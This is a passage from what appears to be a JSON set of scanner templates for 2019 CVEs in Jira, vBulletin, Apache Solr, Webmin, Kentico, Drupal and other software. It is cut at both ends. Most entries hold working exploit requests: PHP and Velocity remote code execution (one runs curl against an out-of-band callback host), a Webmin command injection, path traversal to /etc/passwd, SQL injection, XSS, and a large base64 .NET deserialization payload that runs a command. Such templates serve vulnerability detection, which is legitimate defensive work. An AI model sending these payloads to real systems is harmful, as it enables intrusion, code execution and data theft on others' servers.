{{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"threads":50,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"word","words":["\"users\":","\"total\":","\"header\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","negative":true,"words":["Showing 0 of 0 matching users"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12616","info":{"name":"phpMyAdmin <4.9.0 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.9.0')"]},{"type":"word","words":["phpmyadmin.net","phpMyAdmin"],"condition":"or"},{"type":"status","status":[200,401]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } 